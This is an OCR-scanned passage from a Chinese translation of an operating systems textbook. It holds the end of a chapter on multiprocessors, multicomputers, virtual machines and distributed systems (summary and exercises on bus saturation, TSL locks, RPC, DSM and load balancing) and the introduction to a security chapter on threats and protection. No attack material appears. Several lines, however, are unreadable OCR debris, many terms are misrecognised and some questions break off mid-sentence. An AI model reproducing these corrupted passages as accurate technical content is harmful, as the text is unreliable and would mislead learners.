2003) 和 分 布 式 文件 系统 的 可 扩展 性 (Ghemawat 等 人 ，2003; Saito, 
2002; Weil 等 人 ，2006) 。 如 何 扩 展 分 布 式 系统 也 已 经 被 研 究 (Peek 等 
人 ，2007) 。 点 对 点 〈P2P) 分 布 式 文件 系统 也 被 广泛 地 研究 (Dabek 
等 人 ，2001; Gummadi 等 人 ，2003; Mnuthitacharoen 等 人 ，2002; 





Rowstron 和 Druschel，2001) 。 在 有 一 些 节 点 可 以 移动 的 情况 下 ， 能 源 
有 效 利 用 率 也 开始 变 得 很 重要 (Nightingale 和 Flinm，2004) 。 


8.6 ”小结 


采用 多 个 CPU 可 以 把 计算 机 系统 建造 得 更 快 更 可 靠 。CPU 的 四 种 组 
织 形式 是 多 处 理 器 、 多 计算 机 、 虚 拟 机 和 分 布 式 系统 。 其 中 的 每 一 种 都 
有 其 自己 的 特性 和 问题 。 


一 个 多 处 理 器 包括 两 个 或 多 个 CPU， 它 们 共享 一 个 公共 的 RAM。 
这 些 CPU 可 以 通过 总 线 、 交 叉 开 关 或 一 个 多 级 交换 网 络 互 连 起 来 。 各 种 
操作 系统 的 配置 都 是 可 能 的 ， 包 括 给 每 个 CPU 配 一 个 各 自 的 操作 系统 、 
配置 一 个 主 操作 系统 而 其 他 是 从 属 的 操作 系统 或 者 是 一 个 对 称 多 处 理 
器 ， 在 每 个 CPU 上 都 可 运行 的 操作 系统 的 一 个 副本 。 在 后 一 种 情形 下 ， 
需要 用 锁 提 供 同步 。 当 没有 可 用 的 锁 时 ， 一 个 CPU 会 空转 或 者 进行 上 下 
文 切换 。 各 种 调度 算法 都 是 可 能 的 ， 包 括 分 时 、 空 间 分 割 以 及 群 调度 。 


多 计算 机 也 有 两 个 或 更 多 的 CPU， 但 是 这 些 CPU 有 自己 的 私有 存储 
器 。 它 们 没有 任何 公共 的 RAM， 所 以 全 部 的 通信 通过 消息 传递 完成 。 
在 有 些 情形 下 ， 网 络 接 口 卡 有 自己 的 CPU， 此 时 在 主 CPU 和 接口 板 上 的 
CPU 之 间 的 通信 必须 仔细 地 组 织 ， 以 避免 竞争 条 件 的 出 现 。 在 多 计算 机 
中 的 用 户 级 通信 和 常常 使 用 远程 过 程 调用 ， 但 也 可 以 使 用 分 布 式 共享 存储 
器 。 这 里 进程 的 负载 平衡 是 一 个 问题 ， 有 多 种 算法 用 以 解决 该 问题 ， 包 
括 发 送 者 -驱动 算法 、 接 收 者 -驱动 算法 以 及 竞标 算法 等 。 








虚拟 机 人 允许 一 个 或 多 个 实际 的 CPU 提供 比 现 有 CPU 数量 更 多 的 假 
象 。 通 过 这 种 方式 ， 可 以 同时 在 同一 个 硬件 上 运行 多 种 操作 系统 ， 或 者 
同一 个 操作 系统 的 不 同 〈 不 兼容 ) IRA. Sea SSRN it, BA 
计算 机 束 变 成 了 一 个 潜在 的 大 规模 多 计算 机 。 





分 布 式 系统 是 一 个 松散 耦合 的 系统 ， 其 中 每 个 节点 是 一 台 完 整 的 计 
算 机 ， 配 有 全 部 的 外 部 设备 以 及 自己 的 操作 系统 。 这 些 系统 常常 分 布 在 
较 大 的 地 理 区 域内 。 在 操作 系统 上 通常 设计 有 中 间 件 ， 从 而 提供 一 个 统 
一 的 层次 以 方便 与 应 用 程序 的 交互 。 中 间 件 的 类 型 包括 基于 文档 、 基 于 
文件 、 基 于 对 象 以 及 基于 协调 的 中 间 件 。 有 关 的 一 些 例 子 有 World Wide 
Web、CORBA、Linda 以 及 Jini。 














习题 


1. 可 以 把 USENET 新 闻 组 系统 和 SETI@home 项 目 看 作 分 布 式 系统 
吗 ? (SETIOhome 使 用 数 百 万 台 空 闲 的 个 人 计算 机 ， 用 来 分 析 无 线 电 
频谱 数据 以 搜寻 地 球 之 外 的 智慧 生物 ) 。 如 果 是 ， 它 们 属于 图 8-1 中 描 


述 的 哪些 类 ? 


2. 如 果 一 个 多 处 理 器 中 的 两 个 CPU 在 同一 时 刻 ， 试 图 访问 内 存 中 同 


一 个 字 ， 会 发 生 什么 事情 ? 


3. 如 采 一 个 CPU 在 每 条 指令 中 都 发 出 一 个 内 存 访问 请 求 ， 而 且 计 算 
机 的 运行 速度 是 200MIPS， 那 么 多 少 个 CPU 会 使 一 个 400MHz 的 总 线 饱 
和 ? 假设 对 内 存 的 访问 需要 一 个 总 线 周 期 。 如 果 在 该 系统 中 使 用 缓存 技 
术 ， 且 缓存 命 中 率 达 到 90%， 那 么 多 少 个 CPO 会 使 总 线 饱 和 ? 最 后 ， 如 
果 要 使 32 个 CPU 共享 该 总 线 而 且 不 使 其 过 载 ， 需 要 多 高 的 命中 率 ? 


4. 在 图 8-5 的 omega 网 络 中 ， 假 设 在 交换 网 络 2A 和 交换 网 络 3B 之 间 的 
连 线 断 了 。 那 么 哪些 节点 之 间 的 联系 被 切断 了 ? 


5. 在 图 8-7 的 模型 中 ， 信 号 是 如 何 处 理 的 ? 


6. 使 用 纯 read 重 写 图 2-22 中 的 enter_region 代 码 ， 用 以 减少 由 TSL 指 令 
Fr S| EAER - 


7. 多 核 CPU 开 始 在 普通 的 介面 机 和 笔记 本 电脑 上 出 现 ， 拥 有 数 十 乃 
至 数 百 个 核 的 桌面 机 也 为 期 不 远 了 。 利 用 这 些 计算 能 力 的 一 个 可 能 的 方 
式 是 将 标准 的 桌面 应 用 程序 并 行 化 ， 例 如 文字 处 理 或 者 web 浏览 器 ;， 另 
一 个 可 能 的 方式 是 将 操作 系统 提供 的 服务 〈 例 如 TCP 操 作 ) 和 向 用 的 库 
服务 〈 例 如 安全 http 库 函数 ) 并 行 化 。 你 认为 哪 一 种 方式 更 有 前 途 ? 为 
fH 


8. 为 了 避免 竞争 ， 在 SMP 操 作 系 统 代码 段 中 的 临界 区 真 的 有 必要 
吗 ， 或 者 数据 结构 中 的 互 斥 信号 量 也 可 完成 这 项 工作 吗 ? 


9. 在 多 处 理 器 同步 中 使 用 TSL 指 令 时 ， 如 果 持 有 锁 的 CPU 和 请 求 锁 
的 CPU 都 需要 使 用 这 个 拥有 互 斥 信号 量 的 高 速 缓冲 块 ， 那 么 这 个 拥有 互 
斤 信 号 量 的 高 速 缓冲 块 就 得 在 上 述 两 个 CPU 之 间 来 回 罕 权 。 为 了 减少 总 
线 交 通 的 繁忙 ， 每 隔 50 个 总 线 周期 ， 请 求 锁 的 CPU 就 执行 一 条 TSL 指 
令 ,， 但 是 持 有 锁 的 CPU 在 两 条 TSL 指 令 之 间 需 要 频繁 地 引用 该 拥有 互 斥 
信号 量 的 高 速 缓冲 块 。 如 果 一 个 高 速 缓冲 块 中 有 16 个 32 位 字 ， 每 一 个 字 
都 需要 用 一 个 总 线 周期 传送 ， 而 该 总 线 的 频率 是 400MHz， 那 么 高 速 绥 
冲 块 的 来 回 移动 会 占用 多 少 总 线 带 宽 ? 




















10. 课 文中 曾经 建议 在 使 用 TSL 轮 询 锁 之 间 使 用 二 进 制 指 数 补偿 算 
法 。 也 建议 过 在 轮 询 之 间 使 用 最 大 时 延 。 如 果 没 有 最 大 时 延 ， 该 算法 会 
正确 工作 吗 ? 


11. 假 设 在 一 个 多 处 理 器 的 同步 处 理 中 没有 TSL 指 令 。 相 反 ， 提 供 了 
男 一 个 指令 SWP， 该 指令 可 以 把 一 个 寄存 器 的 内 容 交 换 到 内 存 的 一 个 字 
中 。 这 个 指令 可 以 用 于 多 处 理 器 的 同步 吗 ? 如 果 可 以 ， 它 应 该 怎样 使 
用 ? 如 果 不 行 ， 为 什么 它 不 行 ? 


12. 在 本 问题 中 ， 读 者 要 计算 把 一 个 自 旋 锁 放 到 总 线 上 需要 花费 总 

线 的 多 少 装载 时 间 。 假 设 CPU 执 行 每 条 指令 花费 5 纳 秒 。 在 一 条 指令 执 

行 完毕 之 后 ， 不 需要 任何 总 线 周 期 ， 例 如 ， 执 行 TSL 指 令 。 每 个 总 线 周 

期 比 指令 执行 时 间 长 10 纳 秒 甚至 更 多 。 如 果 一 个 进程 使 用 TSL 循 环 试图 

进入 某 个 临界 区 ， 它 要 耗费 多 少 的 总 线 带宽 ? 假设 通常 的 高 速 缓冲 处 理 
正在 工作 ， 所 以 取 一 条 循环 体 中 的 指令 并 不 会 浪费 总 线 周 期 。 














13. 图 8-12 用 于 描绘 分 时 环境 ， 为 什么 在 b 部 分 中 只 出 现 了 进程 A? 





14. 亲 和 调度 减少 了 高 速 缓冲 的 失效 。 它 也 减少 TLB 的 失效 吗 ? 对 于 
i DL We ? 


15. 对 于 图 8-16 中 的 每 个 拓扑 结构 ， 互 连 网 络 的 直径 是 多 少 ? 请 计算 
该 问题 的 所 有 跳 数 〈 主 机 -路 由 堪 和 路 由 大 -路 由 妖 ) o 


16. 考 虑 图 8-16 d 中 的 双 凸 面 拓扑 ， 但 是 扩展 到 kxk。 该 网 络 的 直径 
是 多 少 ? 提示 : 分 别 考 虑 k 是 奇数 和 侦 数 的 情况 。 


17. 互 联网 络 的 平分 贷款 经 常用 来 测试 网 络 容量 。 其 计算 方法 是 ， 


通过 移 走 最 小 数量 的 链接 ， 将 网 络 分 成 两 个 相等 的 部 分 。 然 后 把 被 移 走 
链接 的 容量 加 入 进去 。 如 果 有 很 多 方法 进行 分 割 ， 那 么 最 小 带宽 束 是 其 
平分 融 宽 。 对 于 有 一 个 8x8x8 立 方 体 的 互连网 络 ， 如 条 每 个 链接 的 带宽 


是 1Gbps， 那 么 其 平分 带宽 是 多 少 ? 





18. 如 果 多 计算 机 系统 中 的 网 络 接口 处 于 用 户 模 式 ， 那 么 从 源 RAM 
到 目的 RAM 只 需要 三 个 副本 。 假 设 该 网 络 接 口 卡 接收 或 发 送 一 个 32 位 
的 字 需 要 20ns， 并 且 该 网 络 接 口 卡 的 频率 是 1Gbps。 如 果 忽 略 挥 复制 的 
时 间 ， 那 么 把 一 个 64 字 市 的 包 从 源 送 到 目的 地 的 延 时 是 多 少 ? WRG 
复制 的 时 间 呢 ? 接 独 考虑 需要 有 两 次 额外 复制 的 情形 ， 即 在 发 送 方 将 数 
据 复 制 到 内 核 的 时 间 ， 和 在 接收 方 将 数据 从 内 核 中 取出 的 时 间 。 在 这 种 
情形 下 的 延 时 是 多 少 ? 








19. 对 于 三 次 复制 和 五 次 复制 的 情形 ， 重 复 前 一 个 问题 ， 不 过 这 次 
wee Ub ae Hr Bie TT AN eh EEL 


20. 在 共享 存储 器 多 处 理 器 和 多 计算 机 之 间 send 和 receive 的 实现 要 有 
多 少 差 别 ， 这 些 差别 对 性 能 有 何 影响 ? 


21. 在 将 数据 从 RAM 传 送 到 网 络 接口 时 ， 可 以 使 用 和 钉 住 页 面 的 方 
法 ， 假 设 钉 住 和 释放 页 面 的 系统 调用 要 花费 1 微 秒 时 间 。 使 用 DMA 方 法 
复制 速度 是 5 字 节 / 纳 秒 ， 而 使 用 编程 WO 方法 需要 20 纳 秒 。 一 个 数据 包 应 
该 有 多 大 才 值 得 钉 住 页 面 并 使 用 DMA 方 法 ? 


22. 将 一 个 过 程 从 一 人 台 机 器 中 取出 并 且 放 到 另 一 人 台 机 器 上 称 为 RPC， 
但 会 出 现 一 些 问 题 。 在 正文 中 ， 我 们 指出 了 其 中 四 个 : 指针 、 未 知 数 组 
大 小 、 未 知 参数 类 型 以 及 全 局 变量 。 有 一 个 未 讨论 的 问题 是 ， 如 果 〔 远 
程 》 过 程 执行 一 个 系统 调用 会 怎样 。 这 样 做 会 引起 什么 问题 ， 应 该 怎样 
处 理 ? 





23. 在 DSM 系 统 中 ， 当 出 现 一 个 页 面 故障 时 ， 必 须 对 所 需要 的 页 面 
进行 定位 。 请 列 出 两 种 寻找 该 页 面 的 可 能 途径 。 


24. 考 虑 图 8-24 中 的 处 理 避 分 配 。 假 设 进程 H 从 节点 2 被 移 到 节点 3 
上 。 此 时 的 外 部 信息 流量 是 多 少 ? 





25. 某 些 多 计算 机 允许 把 运行 着 的 进程 从 一 个 节点 迁移 到 为 一 个 市 
扩 。 停 止 一 个 进程 ， 冻 结 其 内 存 映 像 ， 然 后 束 把 他 们 转移 到 为 一 个 节点 
上 是 否 足 够 ”请 指出 要 使 所 述 的 方法 能 够 工作 的 两 个 必须 解决 的 问题 。 





26. 考 虑 能 同时 支持 最 多 n 个 虚拟 机 的 I 型 管理 程序 ，PC 机 最 多 可 以 
有 4 个 主 磁盘 分 区 。 请 问 n 可 以 比 4 大 吗 ? 如 果 可 以 ， 数 据 可 以 存在 哪 
里 ? 


27. 处 理 客户 操作 系统 使 用 普通 非特 权 ) 指令 改变 页 表 的 一 个 方 
式 是 将 页 表 标 记 为 只 读 ， 所 以 当 它 被 修改 的 时 候 系 统 陷 入 。 还 有 什么 方 
式 可 以 维护 页 表 副 本 (shadow page table) ? 比较 你 的 方法 与 只 读 页 表 
方式 在 效率 上 的 差别 。 








28.VMware 每 次 对 一 个 基本 块 进行 二 进 制 转换 ， 然 后 执行 这 个 基本 
块 并 开始 转换 下 一 个 基本 块 。 它 能 事先 转换 整个 程序 然后 执行 吗 ? 如果 
能 ， 每 种 技术 的 优点 和 缺点 分 别 是 什么 ? 


29. 如 果 一 个 操作 系统 的 源 代码 可 以 得 到 ， 对 半 虚 拟 化 一 个 操作 系 
统 有 意义 吗 ? 如 果 源 代码 不 能 得 到 呢 ? 





30. 各 种 PC 在 压 层 会 有 微小 的 差别 ， 例 如 如 何 管 理 时 钟 、 如 何 处 理 
中 断 以 及 DMA 方 面 的 一 些 细节 。 那 么 这 些 差 别 是 否 意 味 着 虚拟 机 在 实 
际 中 不 能 够 很 好 地 工作 ? 请 解释 你 的 答案 。 








31. 在 以 太 网 上 为 什么 会 有 对 电线 长 度 的 限制 ? 


32. 在 一 合 PC 上 运行 多 个 虚拟 机 需要 大 量 的 内 存 ， 为 什么 ? 你 能 想 
出 什么 方式 降低 内 存 的 使 用 量 ? 请 解释 理由 。 


33. 在 图 8-30 中 ， 四 侣 机 需 上 的 第 三 层 和 第 四 层 标 记 为 中 间 件 和 应 
用 。 在 何 种 角度 上 它们 是 跨 平台 一 致 的 ， 而 在 何 种 角度 上 它们 是 跨 平台 
有 差异 的 ? 


34. 在 图 8-33 中 列 出 了 六 种 不 同 的 服务 。 对 于 下 面 的 应 用 ， 哪 一 种 更 
适用 ? 


a)Internet 上 的 视频 点 播 。 


b) 下 载 一 个 网 页 。 


35.DNS 的 名 称 有 一 个 层次 结构 ， 如 cs.uni.edu 或 sales.general- 
widget.com。 维 护 DNS 数 据 库 的 一 种 途径 是 使 用 一 个 集中 式 的 数据 库 ， 
但 是 实际 上 并 没有 这 样 做 ， 其 原因 是 每 秒 钟 会 有 太 多 的 请 求 。 请 提出 一 
个 实用 的 维护 DNS 数 据 库 的 建议 。 





36. 在 讨论 浏览 器 如 何 处 理 URL 时 ， 曾 经 说 明 与 端口 80 连 接 。 为 什 


37. 虚 拟 机 迁移 可 能 比 进程 迁移 容易 ， 但 是 迁移 仍然 是 困难 的 。 在 
虚拟 机 迁移 的 过 程 中 会 产生 哪些 问题 ? 


38. 在 显示 网 页 中 使 用 的 URL 可 以 透明 吗 ? 请 解释 理由 。 





39. 当 浏览 器 获取 一 个 网 页 时 ， 它 首先 发 起 一 个 TCP 链 接 以 获得 页 面 
上 的 文本 《该 文本 用 HIML 语 言 写 成 ) 。 然 后 关闭 链接 并 分 析 该 页 面 。 
如 果 页 面 上 有 图 形 或 图 标 ， 就 发 起 不 同 的 TCP 链 接 以 获取 它们 。 请 给 出 
两 个 可 以 改善 性 能 的 替代 建议 。 


40. 在 使 用 会 话语 义 时 ， 有 一 项 总 是 成 立 的 ， 即 一 个 文件 的 修改 对 
于 进行 该 修改 的 进程 而 言 是 立即 可 见 的 ， 而 对 其 他 机 器 上 的 进程 而 言 是 
绝对 不 可 见 的 。 不 过 存在 一 个 问题 ， 即 这 种 修改 对 同一 台 机 器 上 的 其 他 
进程 是 否 应 该 立即 可 见 。 请 提出 正 反 双方 的 争辩 意见 。 











41. 当 有 多 个 进程 需要 访问 数据 时 ， 基 于 对 象 的 访问 在 哪些 方面 要 
好 于 共享 存储 器 ? 


42. 在 Linda 的 ip 操作 完成 对 一 个 元 组 的 定位 之 后 ， 线 性 地 查询 整个 
元 组 空间 是 非常 低 效 率 的 。 请 设计 一 个 组 织 元 组 空间 的 方式 ， 可 以 在 所 
有 的 ip 操作 中 加 快 得 询 操作 。 


43. 绥 存 区 的 复制 很 花费 时 间 。 写 一 个 C 程 序 找 出 你 访问 的 系统 中 这 
种 复制 花费 了 多 少时 间 。 可 使 用 cdlock 或 times 函 数 用 以 确定 在 复制 一 个 
大 数组 时 所 花费 的 时 间 。 请 测试 不 同 大 小 的 数组 ， 以 便 把 复制 时 间 和 系 
统 开 销 时 间 分 开 。 


44. 编 写 可 作为 客户 机 和 服务 器 代码 片段 的 C 函 数 ， 使 用 RPC 来 调用 
标准 printf 函 数 ， 并 编写 一 个 主 程序 来 测试 这 些 函 数 。 客 户 机 和 服务 占 
通过 一 个 可 在 网 络 上 传输 的 数据 结构 实现 通信 。 读 者 可 以 对 客户 机 所 能 
接收 的 格式 化 字符 串 长 度 以 及 数字 、 类 型 和 变量 的 大 小 等 方面 设置 限 
制 |。 


45. 写 两 个 程序 用 以 模拟 一 台 多 计算 机 上 的 负载 平衡 。 第 一 个 程序 
应 该 按照 一 个 初始 化 文件 把 mm 个 进程 分 布 到 n 个 机 器 上 。 每 个 进程 应 该 
有 一 个 通过 Gaussian 分 布 随机 挑选 的 运行 时 间 ， 即 该 分 布 的 平均 值 和 标 
准 偏差 是 模拟 的 参数 。 在 每 次 运行 的 结尾 ， 进 程 创建 一 些 新 的 进程 ， 按 
照 Poisson 分 布 选择 这 些 新 进程 。 当 一 个 进程 退出 时 ，CPU 必 须 确定 是 放 


弃 进 程 或 是 寻找 新 的 进程 。 如 果 在 机 器 上 有 忆 数 超过 k 个 进程 的 话 ， 第 
一 个 程序 应 该 使 用 发 送 者 驱动 算法 放弃 工作 。 第 二 个 程序 在 必要 时 应 该 
使 用 接收 者 驱动 算法 获得 工作 。 请 给 出 所 需要 的 合理 假设 ， 但 要 写 出 清 
楚 的 说 明 。 





46. 写 一 个 程序 ， 实 现 8.2 节 中 描述 的 发 送 方 驱动 和 接收 方 驱动 的 负 
载 平衡 算法 。 这 个 算法 必须 把 新 创建 的 作业 列表 作为 输入 ， 作 业 的 描述 
J Ccreating_processor, start_time, required_CPU_time) ， 其 中 
creating_processor 表 示 创 建 作 业 的 CPU 序号 ，start_time 表 示 创 建 作 业 的 
时 间 ，required_CPU_time 表 示 完 成 作业 所 需要 的 时 间 (以 秒 为 单位 〉。 
当 节 点 在 执行 一 个 作业 的 同时 有 第 二 个 作业 被 创建 ， 则 认为 该 节点 超 负 
和 荷 。 在 重负 载 和 轻 负 载 的 情况 下 分 别 打印 算法 发 出 的 探测 消息 的 数目 。 
同时 ， 也 要 打印 任意 主机 发 送 和 接收 的 最 大 和 最 小 的 探 针 数 。 为 了 模拟 
负载 ， 要 写 两 个 负载 产生 器 。 第 一 个 产生 器 模拟 重 的 负载 ， 产 生 的 负载 
为 平均 每 隔 A 开 秒 N 个 作业 ， 其 中 A 开 是 作业 的 平均 长 度 ，N 是 处 理 器 个 
数 。 作 业 长 度 可 能 有 长 有 短 ， 但 是 平均 作业 长 度 必 须 是 AIL。 作 业 必 须 
随机 地 创建 (放置 ) 在 所 有 处 理 器 上 。 第 二 个 产生 器 模拟 轻 的 负载 ， 每 
AJL 秒 随机 地 产生 N3) 个 作业 。 为 这 两 个 负载 产生 器 调节 其 他 的 参 
数 设置 ， 看 看 是 如 何 影 响 探测 消息 的 数目 。 











47. 实 现 发 布 /订阅 系统 的 最 简单 的 方式 是 通过 一 个 集中 的 代理 ， 这 
个 代理 接收 发 布 的 文章 ， 然 后 同 合适 的 订阅 者 分 发 这 些 文 章 。 写 一 个 多 








线程 的 应 用 程序 来 模拟 一 个 基于 代理 的 发 布 /订阅 系统 。 发 布 者 和 订阅 
者 线程 可 以 通过 《〈 共 享 ) 内 存 与 代理 进行 通信 。 每 个 消息 以 消息 长 度 域 
开头 ， 后 面 紧 跟 着 其 他 字符 。 发 布 者 给 代理 发 布 的 消息 中 ， 第 一 行 是 
用 “.” 隔 开 的 层次 化 主题 ， 后 面 一 行 或 多 行 是 发 布 的 文章 正文 。 订 阅 者 给 
代理 发 布 的 消息 ， 只 包含 着 一 行 用 “.” 隔 开 的 层次 化 的 兴趣 行 (interest 
line) ， 表 示人 他们 所 感 兴 趣 的 文章 。 兴 趣 行 可 能 包含 “*.” 等 通配符 ， 代 理 
必须 返回 匹配 订阅 者 兴趣 的 所 有 (过 去 的 ) 文章 ， 消 息 中 的 多 篇 文章 通 
过 “BEGIN NEW ARTICLE” 来 分 隔 。 订 阅 者 必须 打印 他 接收 到 的 每 条 消 
电 《〈 如 他 的 兴趣 行 ) 。 订 阅 者 必须 连续 接收 任何 匹配 的 新 发 布 的 文章 。 
发 布 者 和 订阅 者 线程 可 通过 终端 输入 “P” 或 “S” 的 方式 自由 创建 (分 别 对 
应 发 布 者 和 订阅 者 ) ， 后 面 紧 跟 的 是 层次 化 的 主题 或 兴趣 行 。 然 后 发 布 
者 需要 输入 文章 ， 在 某 一 行 中 键入 “.” 表 示 文 章 结 束 。 (这 个 作业 也 可 以 
基于 TCP 的 进程 间 通 信 来 实现 ) 。 




















第 9 章 ”安全 





许多 公司 持 有 一 些 有 价值 的 并 加 以 密切 保护 的 信息 。 这 些 信息 可 以 
是 技术 上 的 (如 新 球 心 片 或 软件 的 设计 方案 〉 、 商 业 上 的 (如 针对 苋 争 
对 手 的 研究 报告 或 营销 计划 ) 、 财 务 方面 的 《如 股票 分 红 预 案 ) 、 法 律 
上 的 (如 潜在 并 购 方案 的 法 律 文本 〉 以 及 其 他 可 能 有 价值 的 信息 。 公 司 
通常 在 存放 这 些 信息 的 大 楼 入 口 处 安排 佩带 统一 徽章 的 警卫 ， 由 他 们 来 
检查 进入 大 楼 的 人 群 。 并且， 办 公 室 和 文件 柜 通 常会 上 锁 以 确保 只 有 经 
过 授权 的 人 才能 接触 到 这 类 信息 。 





家 用 计算 机 也 越 来 越 多 地 开始 保存 重要 的 数据 。 很 多 人 将 他 们 的 纳 
税 申报 单 和 信用 卡号 码 等 财务 信息 保存 在 计算 机 上 。 人 情书 也 越 来 越 多 地 
以 电子 信件 的 方式 出 现 。 目 前 计算 机 硬盘 已 经 装 满 了 重要 的 照片 、 视 频 
以 及 电影 。 


随 厦 越 来 越 多 的 信息 存放 在 计算 机 系统 中 ， 确 保 这 些 信 息 的 安全 就 
变 得 越 来 越 重要 。 对 所 有 的 操作 系统 而 言 ， 保 护 此 类 信息 不 被 未 经 许可 
地 滥用 是 主要 考虑 的 问题 。 然 而 ， 随 着 计算 机 系统 的 广泛 使 用 (和 随 之 
而 来 的 系统 缺陷 ) ， 保 证 信息 安全 也 变 得 越 来 越 难 。 在 下 面 的 小 市 里 ， 
我 们 将 讨论 有 关 安 全 与 防护 的 大 干 话题 ， 其 中 一 些 内 容 与 我 们 保护 现实 
生活 中 的 纸 质 文件 比较 相似 ， 而 男 一 些 则 是 计算 机 系统 所 独 有 的 。 在 这 
一 章 里 ， 我 们 将 考察 安装 了 操作 系统 之 后 的 计算 机 安全 特性 。 








有 关 操 作 系统 安 全 的 话题 在 过 去 的 二 十 年 里 产生 了 很 大 的 变化 。 在 
20 世 纪 90 年 代 早 期 之 前 ， 少 数 家 寿 才 拥有 计算 机 ， 几 乎 所 有 的 计算 都 是 
在 公司 、 大 学 和 其 他 一 些 拥有 多 用 户 计算 机 (从 大 型 机 到 微型 计算 机 )》 
的 组 织 中 完成 的 。 这 些 机 器 几乎 都 是 相互 隔离 的 ， 没 有 任何 一 台 被 连接 
到 网 络 中 。 在 这 样 的 环境 下 ， 保 证 安全 性 所 要 做 的 全 部 工作 就 集中 在 了 
如 何 保证 每 个 用 户 只 能 看 到 自己 的 文件 。 如 果 Tracy 和 Marcia 是 同一 台 计 
算 机 的 两 个 注册 用 户 ， 那 么 “安全 性 ”就 是 保证 他 们 谁 都 不 能 读 取 或 修改 
对 方 的 文件 ， 除 非 这 个 文件 被 设 为 共享 权限 。 复 杂 的 模型 和 机 制 被 开发 
出 来 ， 以 保证 没有 哪个 用 户 可 以 获取 非法 权限 。 


有 时 这 种 安全 模型 和 机 制 涉及 一 类 用 户 ， 而 非 单个 用 户 。 例 如 ， 在 
一 台 军 用 计算 机 中 ， 任 何 数据 都 必须 被 标记 为 “绝密 ”、“ 机 密 ”、“ 秘 
密 ? 或 “公开 ”， 而 且 下 士 不 能 允许 查看 将 军 的 目录 ， 不 论 这 个 下 士 是 
谁 ， 无 论 他 想 要 奋 看 的 将 军 是 谁 ， 这 种 越权 访问 都 必须 被 茶 止 。 在 过 去 
的 几 十 年 中 ， 这 样 的 问题 被 反复 地 研究 、 报 道 和 解决 。 








当时 一 个 潜在 的 假设 是 ， 一 旦 选 定 了 一 个 模型 并 据 此 实现 了 安全 系 
统 ， 那 么 实现 该 系统 的 软件 也 是 正确 的 ， 会 完全 执行 选 定 的 安全 策略 。 
通常 情况 下 ， 模 型 和 软件 都 非常 简 蛙 ， 因 此 该 假设 常 肖 是 成 立 的 。 即 如 
果 Tracy 理 论 上 不 被 允许 查看 Marcia 的 某 个 文件 ， 那 么 她 的 确 无 法 碍 看 。 


随 着 个 人 计算 机 和 互联 网 的 普及 ， 以 及 公用 大 型 机 和 小 型 机 的 消 
失 ， 人 情况 发 生 了 变化 《尽管 不 是 翻天 禾 地 的 变化 ， 在 局 域 网 的 公共 服务 

















句 与 公用 小 型 计算 机 很 相似 )。 至 少 对 于 家 性 用 户 来 说 ， 他 们 受到 非法 
用 户 入 侵 并 被 贸 取 信息 的 威胁 变 得 不 存在 了 ， 因 为 别人 不 能 使 用 他 们 的 
计算 机 。 





不 幸 的 是 ， 就 在 这 些 威胁 消失 的 同时 ， 另 一 种 威胁 悄然 而 至 〈 威 胁 
守恒 的 法 则 ? ) : 来 自 外 部 的 攻击 。 病 毒 (Virus). EE (Worm) 和 
其 他 恶意 代码 通过 互联 网 开始 在 计算 机 中 蔓延 ， 并 娃 无 忌 愉 地 进行 破 
坏 。 它 们 的 帮凶 是 软件 漏洞 的 爆炸 性 增长 ， 这 些 大 型 软件 已 经 开始 取代 
以 前 好 用 的 小 软件 。 当 下 的 操作 系统 包括 五 百 万 行 以 上 的 内 核 代 码 和 
100MB 级 的 应 用 程序 来 规定 系统 的 应 用 准则 ， 使 得 系统 中 存在 大 量 可 以 
被 恶意 代码 利用 的 漏洞 。 因 此 我 们 现在 从 形式 上 证 明 是 安全 的 系统 却 可 
能 很 容易 被 侵入 ， 因 为 代码 中 的 漏洞 可 能 允许 恶意 软件 做 一 些 原则 上 被 
禁止 的 事情 。 


基于 以 上 问题 ， 本 章 将 分 为 两 部 分 进行 讨论 。9.1 节 从 一 些 细节 上 
分 析 系 统 威胁 ， 看 看 哪些 是 我 们 想 要 保护 的 。9.2 市 介绍 了 安全 领域 中 
基本 但 却 重要 的 工具 : 现代 密码 学 。9.3 节 介绍 了 关于 安全 的 形式 化 模 
型 ， 并 论述 如 何在 用 户 之 间 进 行 安全 的 访问 和 保护 ， 这 些 用 户 既 有 保密 
的 数据 ， 也 有 与 其 他 用 户 共 至 的 数据 。 








接 下 来 的 五 节 将 讨论 实际 存在 的 安全 问题 ， 对 实际 的 恶意 代码 防护 
和 计算 机 安全 研究 前 沿 进行 讨论 ， 最 后 是 一 个 简短 的 总 结 。 














值得 注意 的 是 ， 尽 管 本 书 是 关于 操作 系统 的 ， 然 而 操作 系统 安全 与 
网 络 安全 之 间 却 有 着 不 可 分 离 的 联系 ， 无 法 将 它们 分 开 讨 论 。 例 如 ， 病 
毒 通 过 网 络 侵入 到 计算 机 中 ， 破 坏 操作 系统 。 总 而 言 之， 我 们 趋 于 做 足 
工作 ， 即 包含 很 多 与 主题 紧密 相关 却 并 不 属于 操作 系统 研究 领域 的 内 


yp Ye 


容 。 
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我 们 从 几 个 术语 的 定义 来 开始 本 章 的 学 习 。 有 些 人 不 加 区 分 地 使 

用 “安全 ”(security) 和 “防护 ”(protection) 两 个 术语 。 然 而 ， 当 我 们 讨 
论 基 本 问题 时 有 必要 去 区 分 “安全 ”与 “防护 ”的 含义 。 这 些 基 本 问题 包括 
确保 文件 不 被 未 经 授权 的 人 读 取 或 自 改 。 这 些 问 题 一 方面 包括 涉及 技 
术 、 管 理 、 法 律 和 政治 方面 的 问题 ， 男 一 方面 也 包括 使 用 特定 的 操作 系 
统 机 制 来 提供 安全 保障 的 问题 。 为 了 避免 混 消 ， 我 们 用 术语 “安全 ”来 表 
示 所 有 的 基本 问题 ， 用 术语 “防护 机 制 ?来 表示 用 特定 的 操作 系统 机 制 确 
保 计 算 机 信息 安全 。 但 是 两 个 术语 之 间 的 界限 没有 定义 。 接 下 来 我 们 看 
一 看 安全 问题 的 特点 是 什么 ， 稍 后 我 们 将 研究 防护 机 制 和 安全 模型 以 帮 
助 获取 安全 屏障 。 











安全 包含 许多 方面 的 内 容 ， 其 中 比较 主要 的 三 个 方面 是 威胁 的 实 
质 、 入 侵 者 的 本 性 和 数据 的 意外 遗失 。 我 们 将 分 别 加 以 研究 。 


9.1.1 威胁 





从 安全 性 角度 来 讲 ， 计 算 机 系统 有 四 个 主要 目标 ， 同 时 也 面临 痢 三 
个 主要 威胁 ， 如 图 9-1 所 示 。 第 一 个 目标 是 数据 保密 (data 
confidentiality〉， 指 将 机 密 的 数据 置 于 保密 状态 。 更 确切 地 说 ， 如 果 数 








据 所 有 者 决定 这 些 数 据 仅 用 于 特定 的 人 而 不 是 其 他 人 ， 那 么 系统 束 应 该 
